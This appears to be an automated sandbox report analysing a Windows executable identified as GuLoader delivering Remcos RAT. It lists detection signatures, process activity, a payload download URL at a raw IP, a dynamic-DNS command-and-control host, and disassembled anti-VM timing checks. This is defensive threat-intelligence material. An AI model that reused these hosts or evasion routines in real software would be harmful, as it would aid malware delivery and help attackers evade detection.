Play interactive tour

Edit tour

Windows Analysis Report LzbZ4T1iV8.exe

Overview

General Information

Sample Name:	LzbZ4T1iV8.exe
Analysis ID:	458125
MD5:	41e1bc9de5f3b61639fb88143e933ff8
SHA1:	432531c5a0f7f82b8ec10e7f3fde1b51ebd3d0e8
SHA256:	d32cf33f8f64824f799ca44e9988ddc517e88db1235f93792d3ed2ddaa48e35f
Tags:	exe
Infos:
Most interesting Screenshot:

Detection

GuLoader Remcos

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

GuLoader behavior detected

Multi AV Scanner detection for submitted file

Yara detected GuLoader

Yara detected Remcos RAT

C2 URLs / IPs found in malware configuration

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Hides threads from debuggers

Installs a global keyboard hook

Machine Learning detection for sample

Tries to detect Any.run

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Uses dynamic DNS services

Abnormal high CPU Usage

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains strange resources

Sample file is different than original file name gathered from version info

Sleep loop found (likely to delay execution)

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

LzbZ4T1iV8.exe (PID: 7032 cmdline: 'C:\Users\user\Desktop\LzbZ4T1iV8.exe' MD5: 41E1BC9DE5F3B61639FB88143E933FF8)

LzbZ4T1iV8.exe (PID: 1504 cmdline: 'C:\Users\user\Desktop\LzbZ4T1iV8.exe' MD5: 41E1BC9DE5F3B61639FB88143E933FF8)

cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "http://101.99.94.119/WEALTH_PRUuqVZw139.bin^"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000002.862709235.00000000020F0000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
0000000D.00000002.1716863368.00000000006E7000.00000004.00000020.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000001.00000002.862709235.00000000020F0000.00000040.00000001.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "http://101.99.94.119/WEALTH_PRUuqVZw139.bin^"}

Multi AV Scanner detection for submitted file

Show sources

Source: LzbZ4T1iV8.exe	Virustotal: Detection: 17%			Perma Link
Source: LzbZ4T1iV8.exe	ReversingLabs: Detection: 17%

Yara detected Remcos RAT

Show sources

Source: Yara match

File source: 0000000D.00000002.1716863368.00000000006E7000.00000004.00000020.sdmp, type: MEMORY

Machine Learning detection for sample

Show sources

Source: LzbZ4T1iV8.exe

Joe Sandbox ML: detected

Source: LzbZ4T1iV8.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: http://101.99.94.119/WEALTH_PRUuqVZw139.bin^

Uses dynamic DNS services

Show sources

Source: unknown

DNS query: name: wealthyrem.ddns.net

Source: global traffic

TCP traffic: 192.168.2.4:49767 -> 194.5.97.128:39200

Source: Joe Sandbox View	ASN Name: DANILENKODE DANILENKODE
Source: Joe Sandbox View	ASN Name: SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY

Source: global traffic

HTTP traffic detected: GET /WEALTH_PRUuqVZw139.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 101.99.94.119Cache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119

Source: global traffic

HTTP traffic detected: GET /WEALTH_PRUuqVZw139.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 101.99.94.119Cache-Control: no-cache

Source: unknown

DNS traffic detected: queries for: wealthyrem.ddns.net

Source: LzbZ4T1iV8.exe, 0000000D.00000002.1716793566.0000000000670000.00000004.00000001.sdmp	String found in binary or memory: http://101.99.94.119/WEALTH_PRUuqVZw139.bin
Source: LzbZ4T1iV8.exe, 0000000D.00000002.1716793566.0000000000670000.00000004.00000001.sdmp	String found in binary or memory: http://101.99.94.119/WEALTH_PRUuqVZw139.binwininet.dllMozilla/5.0

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Installs a global keyboard hook

Show sources

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe

Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\LzbZ4T1iV8.exe

E-Banking Fraud:

Yara detected Remcos RAT

Show sources

Source: Yara match

File source: 0000000D.00000002.1716863368.00000000006E7000.00000004.00000020.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe

Process Stats: CPU usage > 98%

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F588C NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F03CA NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F8FC4 NtProtectVirtualMemory,
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F0BEF NtWriteVirtualMemory,TerminateProcess,LoadLibraryA,
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F93EC NtResumeThread,
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F4C19 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F7EA4 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F42C4 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F58FA NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F474F NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F43A8 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F61C5 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F93FB NtResumeThread,
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 13_2_00569B42 TerminateThread,LdrInitializeThunk,NtProtectVirtualMemory,
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 13_2_00569C0E LdrInitializeThunk,Sleep,LdrInitializeThunk,NtProtectVirtualMemory,
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 13_2_00569B3D TerminateThread,LdrInitializeThunk,NtProtectVirtualMemory,

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_00404478
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_00404418
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_00404834
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_004036F0
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_004034F4
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_00403488
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_004046B4
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_00404774
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_00404534
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_004045F4
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_004035B2
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_004043B8
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F8680
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F0567
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F03CA
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F0BEF
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F93EC
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F4C19
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F424C
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F8A4B
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F3C48
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F0E55
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F8C67
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F9E67
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F1060
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F0E7A
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F1070
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F0C8E
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F808E
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F249F
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F2899
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F7EA4
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F56A3
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F2EA2
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F14C6
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F42C4
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F20C0
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F7AD9
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F10EB
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F7EE6
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F20FE
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F2CF2
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F3912
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F5D10
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F7F34
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F474F
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F154C
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F5D5D
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F0B55
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F1D68
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F1D73
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F43A8
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F3FBC
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F61C5
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F37D8
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F0BD2
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F77FF
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F89FD
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F93FB
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F87FA

Source: LzbZ4T1iV8.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: LzbZ4T1iV8.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: LzbZ4T1iV8.exe, 00000001.00000002.862372500.0000000000417000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameGYMNOSPERMAE.exe vs LzbZ4T1iV8.exe
Source: LzbZ4T1iV8.exe, 0000000D.00000002.1721652241.000000001DD60000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemswsock.dll.muij% vs LzbZ4T1iV8.exe
Source: LzbZ4T1iV8.exe, 0000000D.00000000.861623499.0000000000417000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameGYMNOSPERMAE.exe vs LzbZ4T1iV8.exe
Source: LzbZ4T1iV8.exe	Binary or memory string: OriginalFilenameGYMNOSPERMAE.exe vs LzbZ4T1iV8.exe

Source: LzbZ4T1iV8.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/1@1/2

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe

File created: C:\Users\user\AppData\Roaming\remcos

Jump to behavior

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe

Mutant created: \Sessions\1\BaseNamedObjects\Remcos-FAZALZ

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe

File created: C:\Users\user\AppData\Local\Temp\~DF7C81C95CE370506E.TMP

Jump to behavior

Source: LzbZ4T1iV8.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: LzbZ4T1iV8.exe	Virustotal: Detection: 17%
Source: LzbZ4T1iV8.exe	ReversingLabs: Detection: 17%

Source: unknown	Process created: C:\Users\user\Desktop\LzbZ4T1iV8.exe 'C:\Users\user\Desktop\LzbZ4T1iV8.exe'
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Process created: C:\Users\user\Desktop\LzbZ4T1iV8.exe 'C:\Users\user\Desktop\LzbZ4T1iV8.exe'
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Process created: C:\Users\user\Desktop\LzbZ4T1iV8.exe 'C:\Users\user\Desktop\LzbZ4T1iV8.exe'

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match

File source: 00000001.00000002.862709235.00000000020F0000.00000040.00000001.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_004018D2 push fs; retf
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F662F push cs; iretd
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F003D push esp; iretd
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F00AA push esp; iretd
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 13_2_0056A006 pushfd ; iretd
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 13_2_00569F30 pushfd ; retf

Source: initial sample

Static PE information: section name: .text entropy: 7.08169017725

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Show sources

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F03CA NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F0BEF NtWriteVirtualMemory,TerminateProcess,LoadLibraryA,

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Show sources

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	RDTSC instruction interceptor: First address: 00000000020F7542 second address: 00000000020F7542 instructions:
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	RDTSC instruction interceptor: First address: 00000000020F0504 second address: 00000000020F0504 instructions:

Tries to detect Any.run

Show sources

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	File opened: C:\Program Files\qga\qga.exe
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	File opened: C:\Program Files\qga\qga.exe

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: LzbZ4T1iV8.exe, 00000001.00000002.862725777.0000000002100000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
Source: LzbZ4T1iV8.exe, 00000001.00000002.862725777.0000000002100000.00000004.00000001.sdmp, LzbZ4T1iV8.exe, 0000000D.00000002.1716793566.0000000000670000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: LzbZ4T1iV8.exe, 0000000D.00000002.1716793566.0000000000670000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=HTTP://101.99.94.119/WEALTH_PRUUQVZW139.BINWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKO

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	RDTSC instruction interceptor: First address: 00000000020F74C3 second address: 00000000020F7542 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b push D90E6CFBh 0x00000010 call 00007F7AFC9FAF32h 0x00000015 mov dword ptr [ebp+04h], eax 0x00000018 mov ebx, dword ptr [eax+3Ch] 0x0000001b add eax, ebx 0x0000001d mov ebx, dword ptr [eax+78h] 0x00000020 mov eax, dword ptr [ebp+04h] 0x00000023 add eax, ebx 0x00000025 mov ecx, dword ptr [eax+18h] 0x00000028 mov dword ptr [ebp+08h], ecx 0x0000002b mov ecx, dword ptr [eax+1Ch] 0x0000002e mov dword ptr [ebp+14h], ecx 0x00000031 mov ecx, dword ptr [eax+24h] 0x00000034 mov dword ptr [ebp+10h], ecx 0x00000037 mov esi, dword ptr [eax+20h] 0x0000003a add esi, dword ptr [ebp+04h] 0x0000003d xor ecx, ecx 0x0000003f mov edx, dword ptr [esi] 0x00000041 add edx, dword ptr [ebp+04h] 0x00000044 mov dword ptr [ebp+000001F3h], eax 0x0000004a test si, 2E1Ah 0x0000004f mov eax, ecx 0x00000051 push eax 0x00000052 mov eax, dword ptr [ebp+000001F3h] 0x00000058 mov dword ptr [ebp+000001C8h], ebx 0x0000005e mov ebx, esi 0x00000060 push ebx 0x00000061 pushad 0x00000062 rdtsc
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	RDTSC instruction interceptor: First address: 00000000020F7542 second address: 00000000020F7542 instructions:
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	RDTSC instruction interceptor: First address: 00000000020F734C second address: 00000000020F734C instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 inc ebx 0x00000004 inc edx 0x00000005 dec ecx 0x00000006 test ecx, ecx 0x00000008 jne 00007F7AFC9FAEFEh 0x0000000a mov al, byte ptr [edx] 0x0000000c mov byte ptr [ebx], al 0x0000000e pushad 0x0000000f mov ecx, 00000009h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	RDTSC instruction interceptor: First address: 00000000020F8236 second address: 00000000020F8261 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b sub esi, 6F48A402h 0x00000011 cmp dword ptr [edi+14h], esi 0x00000014 mov esi, dword ptr [ebp+000001F0h] 0x0000001a je 00007F7AFC461375h 0x0000001c mov dword ptr [ebp+00000246h], eax 0x00000022 mov eax, 3E9A0B50h 0x00000027 pushad 0x00000028 lfence 0x0000002b rdtsc
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	RDTSC instruction interceptor: First address: 00000000020F7D0C second address: 00000000020F7D0C instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00B1C905h 0x00000007 xor eax, AE894D5Ah 0x0000000c xor eax, 9A90F0F9h 0x00000011 add eax, CB578B5Bh 0x00000016 cpuid 0x00000018 test ch, dh 0x0000001a popad 0x0000001b call 00007F7AFC9FAF1Bh 0x00000020 lfence 0x00000023 mov edx, 770EC33Bh 0x00000028 sub edx, 4238A07Dh 0x0000002e xor edx, 9CFEAEA4h 0x00000034 xor edx, D7D68C0Eh 0x0000003a mov edx, dword ptr [edx] 0x0000003c lfence 0x0000003f jmp 00007F7AFC9FAFF9h 0x00000044 test ch, ah 0x00000046 ret 0x00000047 sub edx, esi 0x00000049 ret 0x0000004a add edi, edx 0x0000004c dec dword ptr [ebp+000000F8h] 0x00000052 cmp dword ptr [ebp+000000F8h], 00000000h 0x00000059 jne 00007F7AFC9FAEFAh 0x0000005b cmp edx, eax 0x0000005d call 00007F7AFC9FAF5Ch 0x00000062 call 00007F7AFC9FAF3Eh 0x00000067 lfence 0x0000006a mov edx, 770EC33Bh 0x0000006f sub edx, 4238A07Dh 0x00000075 xor edx, 9CFEAEA4h 0x0000007b xor edx, D7D68C0Eh 0x00000081 mov edx, dword ptr [edx] 0x00000083 lfence 0x00000086 jmp 00007F7AFC9FAFF9h 0x0000008b test ch, ah 0x0000008d ret 0x0000008e mov esi, edx 0x00000090 pushad 0x00000091 rdtsc
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	RDTSC instruction interceptor: First address: 00000000020F7E99 second address: 00000000020F7E99 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, FE410F8Bh 0x00000013 xor eax, 50497853h 0x00000018 xor eax, DF92CCE2h 0x0000001d add eax, 8E6544C7h 0x00000022 cpuid 0x00000024 bt ecx, 1Fh 0x00000028 jc 00007F7AFC461A6Eh 0x0000002e cmp edx, eax 0x00000030 popad 0x00000031 test esi, 5A8E86D2h 0x00000037 call 00007F7AFC461551h 0x0000003c lfence 0x0000003f rdtsc
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	RDTSC instruction interceptor: First address: 00000000020F0504 second address: 00000000020F0504 instructions:
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	RDTSC instruction interceptor: First address: 000000000056734C second address: 000000000056734C instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 inc ebx 0x00000004 inc edx 0x00000005 dec ecx 0x00000006 test ecx, ecx 0x00000008 jne 00007F7AFC46130Eh 0x0000000a mov al, byte ptr [edx] 0x0000000c mov byte ptr [ebx], al 0x0000000e pushad 0x0000000f mov ecx, 00000009h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	RDTSC instruction interceptor: First address: 0000000000568236 second address: 0000000000568261 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b sub esi, 6F48A402h 0x00000011 cmp dword ptr [edi+14h], esi 0x00000014 mov esi, dword ptr [ebp+000001F0h] 0x0000001a je 00007F7AFC9FAF65h 0x0000001c mov dword ptr [ebp+00000246h], eax 0x00000022 mov eax, 3E9A0B50h 0x00000027 pushad 0x00000028 lfence 0x0000002b rdtsc
